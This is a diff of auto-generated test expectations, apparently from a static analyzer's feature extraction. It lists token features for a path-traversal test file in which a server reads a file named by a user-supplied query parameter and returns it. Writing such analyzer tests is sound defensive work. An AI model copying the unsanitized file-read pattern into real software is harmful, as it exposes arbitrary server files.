+| autogenerated/TaintedPath/TaintedPath.js:30:15:30:16 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:16 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:16 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:16 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:16 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:29 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:29 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:29 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:29 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:29 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | exceptional return of fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | exceptional return of fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | fs.read ... c(path) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | fs.read ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | fs.read ... c(path) | contextFunctionInterfaces | views_local(req, res) | @@ -4836,6 +58946,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | fs.read ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | fs.read ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:30:15:30:35 | fs.read ... c(path) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:30:18:30:29 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:18:30:29 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:30:18:30:29 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:30:18:30:29 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:30:18:30:29 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:30:31:30:34 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:30:31:30:34 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:30:31:30:34 | path | calleeImports | fs | @@ -4845,6 +58960,131 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:30:31:30:34 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:30:31:30:34 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:30:31:30:34 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:32:3:32:3 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:3:32:3 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:32:3:32:3 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:3:32:3 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:3:32:3 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:10 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:10 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:10 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:10 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path === 'foo.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path === 'foo.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path === 'foo.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path === 'foo.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:24 | path === 'foo.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:46 | path == ... ar.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:46 | path == ... ar.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:46 | path == ... ar.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:46 | path == ... ar.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:46 | path == ... ar.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:71 | path == ... ition() | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:71 | path == ... ition() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:71 | path == ... ition() | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:71 | path == ... ition() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:7:32:71 | path == ... ition() | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:16:32:24 | 'foo.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:16:32:24 | 'foo.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:16:32:24 | 'foo.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:16:32:24 | 'foo.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:16:32:24 | 'foo.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path === 'bar.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path === 'bar.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path === 'bar.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path === 'bar.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:29:32:46 | path === 'bar.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:38:32:46 | 'bar.txt' | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:38:32:46 | 'bar.txt' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:38:32:46 | 'bar.txt' | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:38:32:46 | 'bar.txt' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:38:32:46 | 'bar.txt' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:69 | someOpaqueCondition | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:69 | someOpaqueCondition | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:69 | someOpaqueCondition | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:69 | someOpaqueCondition | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:69 | someOpaqueCondition | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:71 | exceptional return of someOpa ... ition() | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:71 | exceptional return of someOpa ... ition() | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:71 | exceptional return of someOpa ... ition() | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:71 | exceptional return of someOpa ... ition() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:71 | exceptional return of someOpa ... ition() | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:71 | someOpa ... ition() | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:71 | someOpa ... ition() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:71 | someOpa ... ition() | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:71 | someOpa ... ition() | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:32:51:32:71 | someOpa ... ition() | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:5 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:5 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:33:5:33:5 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs 